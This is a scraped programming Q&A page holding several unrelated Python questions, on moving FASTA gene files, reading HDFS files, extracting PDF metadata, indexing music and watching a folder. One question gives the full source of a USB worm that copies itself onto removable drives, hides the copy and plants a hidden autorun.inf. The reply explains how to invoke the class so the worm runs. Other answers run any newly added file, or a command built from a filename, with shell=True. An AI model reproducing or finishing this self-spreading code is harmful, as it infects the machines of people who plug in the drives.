I have created the above script to remove unwanted genes from a database. It does work quite well if you only use it once but I re-run it, it giving me an error message such as:
shutil.Error: Destination path 'path/rejected_database_genes/gene_A.fa' already exists
And obviously it stops. I think that the problem arises when there are two or more genes in the file that needs to be removed.
Kind regards, and thanks for your help.
import glob, sys, os, shutil
from Bio import SeqIO, SearchIO
from Bio.SeqRecord import SeqRecord
import argparse
def help_function():
print 'Hi'
parser = argparse.ArgumentParser()
parser.add_argument('-input_file', '-i',type=str,help='path_to_data')
opts = parser.parse_args()
def check_file_exists(filepath, file_description):
if not os.path.exists(filepath):
print("The " + file_description + " (" + filepath + ") does not exist")
sys.exit(1)
else:
print file_description + " detected"
def remove_empty_files(alleles_files,destination):
input_handle=open(alleles_files, 'r')
gene_records=list(SeqIO.parse(input_handle, 'fasta'))
for gene_record in gene_records:
#filename=gene_record.id[0]
#count=0
if len(gene_record.seq)<5 or 'N'in gene_record.seq:
print gene_record.id
elif '-' in gene_record.seq:
print gene_record.id
#count+=1
shutil.move(alleles_files, destination)
def main():
destination=opts.input_file + '/rejected_database_genes'
if os.path.exists(destination):
print 'Folder already exits'
else:
os.makedirs(destination)
print 'Folder has been created'
files=glob.glob(opts.input_file+'/*.fa')
#print files
#sys.exit()
for f in files:
#print f
#sys.exit()
alleles_files=glob.glob(f)[0]
#print alleles_files
#sys.exit()
remove_empty_files(alleles_files,destination)
print 'Files have been removed'
main()
the problem you have is in the shutil.move line - if you will specify full path to source and destination this will overwrite the existing file and you will not get this error, if you don't want to overwrite and need both of the files, just rename the destination file to something else.
What I wanted was that the moment the script found to remove that file, and storage somewhere else so I can check it later. The problem I was having was that if in the same file there were two unwanted seq, it would through me and error telling me that the file already existed on destination, and stopped. So I managed to solve this problem by added an if statement. The corrected script is the one below:
import glob, sys, os, shutil
from Bio import SeqIO, SearchIO
from Bio.SeqRecord import SeqRecord
import argparse
def help_function():
print 'Hi'
parser = argparse.ArgumentParser()
parser.add_argument('-input_file', '-i',type=str,help='path_to_data')
opts = parser.parse_args()
def check_file_exists(filepath, file_description):
if not os.path.exists(filepath):
print("The " + file_description + " (" + filepath + ") does not exist")
sys.exit(1)
else:
print file_description + " detected"
def remove_empty_files(alleles_files,destination):
input_handle=open(alleles_files, 'r')
gene_records=list(SeqIO.parse(input_handle, 'fasta'))
geneID_list=[]
for gene_record in gene_records:
filename=gene_record.id.split('_')
geneID=filename[0]+'_'+filename[1]
if len(gene_record.seq)<5 or 'N'in gene_record.seq:
geneID_list.append(geneID)
shutil.move(alleles_files, destination)
print geneID_list
#break
if '-' in gene_record.seq:
geneID_list.append(geneID)
shutil.move(alleles_files, destination)
print geneID_list
#break
if len(geneID_list) >0:
break
def main():
if len(sys.argv) <=1:
parser.print_help()
sys.exit()
else:
check_file_exists(opts.input_file, 'input_file')
destination=opts.input_file + '/rejected_database_genes'
if os.path.exists(destination):
print 'Folder already exits'
else:
os.makedirs(destination)
print 'Folder has been created'
files=glob.glob(opts.input_file+'/*.fa')
#print files
#sys.exit()
for f in files:
#print f
#sys.exit()
alleles_files=glob.glob(f)[0]
#print alleles_files
#sys.exit()
remove_empty_files(alleles_files,destination)
print 'Files have been removed'
main()
By adding the third "if" statement, the file is removed as soon as it finds an unwanted sequence, remove the file to destination, and move to check the next file.
Related
Hello I'm trying to compile this code but I don't get it to compile nothing at all, I don't get any error at compiling, but no results either, the folder stays with the .py file only
import win32api
import win32con
import win32file
import sys
import os
class Spreader(object):
def __init__(self, path): # path must be absolute
print (" [*] Checking information")
self.filename = path.split("\\")[-1]
self.driveFilename = self.filename
if not self.driveFilename.startswith("~"):
self.driveFilename = "~" + self.driveFilename
print ("\t- Local filename: ") + self.filename
print ("\t- Driver filename: ") + self.driveFilename
self.path = "\\".join(path.split("\\")[:-1]) + "\\" + self.filename
print ("\t- Full path: ") + self.path
print ("\n [*] Getting removable drives")
self.drives = self.__getRemovableDrives()
if len(self.drives) == None:
print (" [-] No removable drives available")
sys.exit()
for drive in self.drives:
print ("\t- ") + drive
print ("\n [*] Spreading")
self.__spread()
print ("\n [+] Successfully spread")
def __getRemovableDrives(self):
removableDrives = []
drives = win32api.GetLogicalDriveStrings().split("\000")[:-1]
for drive in drives:
driveType = win32file.GetDriveType(drive)
if driveType == win32file.DRIVE_REMOVABLE:
removableDrives.append(drive)
return removableDrives
def __spread(self):
for drive in self.drives:
if drive == "A:\\":
continue
else:
driveFile = drive + self.driveFilename
driveAutorun = drive + "autorun.inf"
print (" [+] ") + drive
if not os.path.exists(driveFile):
self.__copyFile(driveFile)
if not os.path.exists(driveAutorun):
self.__createAutorun(driveAutorun)
def __copyFile(self, driveFile):
print ("\t- Copying file: ") + self.driveFilename,
win32file.CopyFile(self.path, driveFile, 0)
print ("\t\t\tDONE")
print ("\t- Hidding file"),
win32api.SetFileAttributes(driveFile,\
win32con.FILE_ATTRIBUTE_HIDDEN)
print ("\t\t\tDONE")
def __createAutorun(self, driveAutorun):
print ("\t- Creating autorun.inf"),
autorun = open(driveAutorun, "w")
content = """[Autorun]
open={0}
icon={0}
label=Python Spreader
UseAutoPlay=1
action=Start my App
action=#{0}
shell\open=Open
shell\open\Command={0}
shell\explore=explore
shell\explore\command={0}""".format(self.driveFilename)
autorun.write(content)
autorun.close()
print ("\t\t\tDONE")
print ("\t- Hidding autorun"),
win32api.SetFileAttributes(driveAutorun,\
win32con.FILE_ATTRIBUTE_HIDDEN)
print ("\t\t\tDONE")
Can someone help me out?
You have written the code, but you never call your class and its method anywhere. As such, python just creates the class object etc and then does nothing more with it, because there are no more instructions to execute.
I think, at the minimum, you should add the following code to see what output/errors your code gives:
if __name__ == "__main__":
spread = Spreader(some_path)
Note that you are creating method names with the __method convention, which means they are being name scrambled.
Since you are copying files, you can give the actual file path (the complete path of the exe being copied) in place of some_path above, and that should work. If not, you will need to debug deeper using pdb.
Finally, the __main__ block needs to be placed at the end of your script.
I am reading first line of all the files in a directory, on local it works fine but on EMR this test is failing at stuck at around 200-300th file.
Also ps -eLF show increase of childs to 3000 even print in on 200th line.
It this some bug on EMR to read max bytes?
pydoop version
pydoop==0.12.0
import os
import sys
import shutil
import codecs
import pydoop.hdfs as hdfs
def prepare_data(hdfs_folder):
folder = "test_folder"
copies_count = 700
src_file = "file"
#1) create a folder
if os.path.exists(folder):
shutil.rmtree(folder)
os.makedirs(folder)
#2) create XXX copies of file in folder
for x in range(0, copies_count):
shutil.copyfile(src_file, folder+"/"+src_file+"_"+str(x))
#3) copy folder to hdfs
#hadoop fs -copyFromLocal test_folder/ /maaz/test_aa
remove_command = "hadoop fs -rmr "+ hdfs_folder
print remove_command
os.system(remove_command)
command = "hadoop fs -copyFromLocal "+folder+" "+ hdfs_folder
print command
os.system(command)
def main(hdfs_folder):
try:
conn_hdfs = hdfs.fs.hdfs()
if conn_hdfs.exists(hdfs_folder):
items_list = conn_hdfs.list_directory(hdfs_folder)
for item in items_list:
if not item["kind"] == "file":
continue
file_name = item["name"]
print "validating file : %s" % file_name
try:
file_handle = conn_hdfs.open_file(file_name)
file_line = file_handle.readline()
print file_line
file_handle.close()
except Exception as exp:
print '####Exception \'%s\' in reading file %s' % (str(exp), file_name)
file_handle.close()
continue
conn_hdfs.close()
except Exception as e:
print "####Exception \'%s\' in validating files!" % str(e)
if __name__ == '__main__':
hdfs_path = '/abc/xyz'
prepare_data(hdfs_path)
main(hdfs_path)
I suggest using the subprocess module for reading the first line instead of pydoop's conn_hdfs.open_file
import subprocess
cmd='hadoop fs -cat {f}|head -1'.format(f=file_name)
process=subprocess.Popen(cmd, shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr=process.communicate()
if stderr!='':
file_line=stdout.split('\n')[0]
else:
print "####Exception '{e}' in reading file {f}".format(f=file_name,e=stdout)
continue
I wrote a script to read PDF metadata to ease a task at work. The current working version is not very usable in the long run:
from pyPdf import PdfFileReader
BASEDIR = ''
PDFFiles = []
def extractor():
output = open('windoutput.txt', 'r+')
for file in PDFFiles:
try:
pdf_toread = PdfFileReader(open(BASEDIR + file, 'r'))
pdf_info = pdf_toread.getDocumentInfo()
#print str(pdf_info) #print full metadata if you want
x = file + "~" + pdf_info['/Title'] + " ~ " + pdf_info['/Subject']
print x
output.write(x + '\n')
except:
x = file + '~' + ' ERROR: Data missing or corrupt'
print x
output.write(x + '\n')
pass
output.close()
if __name__ == "__main__":
extractor()
Currently, as you can see, I have to manually input the working directory and manually populate the list of PDF files. It also just prints out the data in the terminal in a format that I can copy/paste/separate into a spreadsheet.
I'd like the script to work automatically in whichever directory I throw it in and populate a CSV file for easier use. So far:
from pyPdf import PdfFileReader
import csv
import os
def extractor():
basedir = os.getcwd()
extension = '.pdf'
pdffiles = [filter(lambda x: x.endswith('.pdf'), os.listdir(basedir))]
with open('pdfmetadata.csv', 'wb') as csvfile:
for f in pdffiles:
try:
pdf_to_read = PdfFileReader(open(f, 'r'))
pdf_info = pdf_to_read.getDocumentInfo()
title = pdf_info['/Title']
subject = pdf_info['/Subject']
csvfile.writerow([file, title, subject])
print 'Metadata for %s written successfully.' % (f)
except:
print 'ERROR reading file %s.' % (f)
#output.writerow(x + '\n')
pass
if __name__ == "__main__":
extractor()
In its current state it seems to just prints a single error (as in, the error message in the exception, not an error returned by Python) message and then stop. I've been staring at it for a while and I'm not really sure where to go from here. Can anyone point me in the right direction?
writerow([file, title, subject]) should be writerow([f, title, subject])
You can use sys.exc_info() to print the details of your error
http://docs.python.org/2/library/sys.html#sys.exc_info
Did you check the pdffiles variable contains what you think it does? I was getting a list inside a list... so maybe try:
for files in pdffiles:
for f in files:
#do stuff with f
I personally like glob. Notice I add * before the .pdf in the extension variable:
import os
import glob
basedir = os.getcwd()
extension = '*.pdf'
pdffiles = glob.glob(os.path.join(basedir,extension)))
Figured it out. The script I used to download the files was saving the files with '\r\n' trailing after the file name, which I didn't notice until I actually ls'd the directory to see what was up. Thanks for everyone's help.
I have the current code for a sqlite db creation:
import storage
import os
import audiotools
def store_dir(d):
store = storage.HashStore()
for root, bar, files in os.walk(d):
for filename in files:
filename = root + '/' + filename
try:
store.store_file(filename)
print ("Stored %s% filename")
except audiotools.UnsupportedFile:
print ('Skipping unsupported file %s') % filename
except Exception, e:
print (e)
def main():
d = input('Enter the path to the music directory: ')
store_dir(d)
print ("Done.")
if __name__ == '__main__':
main()
When this code runs I get a syntax error msg. Please help !
Thanks in advance
There are a few things to address here.
First, this line:
print ('Skipping unsupported file %s') % filename
needs to be this:
print ('Skipping unsupported file %s' % filename)
Second, you need to use raw_input here:
d = input('Enter the path to the music directory: ')
which returns a string object, instead of input, which evaluates input as real Python code.
Third, your indentation is off. I'm pretty sure this is just a SO formatting error though.
Finally, you should use os.path.join here:
filename = root + '/' + filename
That isn't an error though, just a tip.
All in all, your code should look like this:
import storage
import os
import audiotools
def store_dir(d):
store = storage.HashStore()
for root, bar, files in os.walk(d):
for filename in files:
filename = os.path.join(root, filename)
try:
store.store_file(filename)
print ("Stored %s% filename")
except audiotools.UnsupportedFile:
print ('Skipping unsupported file %s' % filename)
except Exception, e:
print (e)
def main():
d = raw_input('Enter the path to the music directory: ')
store_dir(d)
print ("Done.")
if __name__ == '__main__':
main()
I've got a small script with monitors when files are added or removed to a directory. The next step is for me to get the script to execute the files (windows batch files) once they’ve been added to the directory. I’m struggling to understand how to use a variable with subprocess call (if this is the best way this can be acheived). Could anyone help me please? Many thanks. Code looks like this so far ;
import sys
import time
import os
inputdir = 'c:\\test\\'
os.chdir(inputdir)
contents = os.listdir(inputdir)
count = len(inputdir)
dirmtime = os.stat(inputdir).st_mtime
while True:
newmtime = os.stat(inputdir).st_mtime
if newmtime != dirmtime:
dirmtime = newmtime
newcontents = os.listdir(inputdir)
added = set(newcontents).difference(contents)
if added:
print "These files added: %s" %(" ".join(added))
import subprocess
subprocess.call(%,shell=True)
removed = set(contents).difference(newcontents)
if removed:
print "These files removed: %s" %(" ".join(removed))
contents = newcontents
time.sleep(15)
This should do what you wanted, cleaned it up a little.
import sys
import time
import os
import subprocess
def monitor_execute(directory):
dir_contents = os.listdir(directory)
last_modified = os.stat(directory).st_mtime
while True:
time.sleep(15)
modified = os.stat(directory).st_mtime
if last_modified == modified:
continue
last_modified = modified
current_contents = os.listdir(directory)
new_files = set(current_contents).difference(dir_contents)
if new_files:
print 'Found new files: %s' % ' '.join(new_files)
for new_file in new_files:
subprocess.call(new_file, shell=True)
lost_files = set(dir_contents).difference(current_contents)
if lost_files:
print 'Lost these files: %s' % ' '.join(lost_files)
dir_contents = current_contents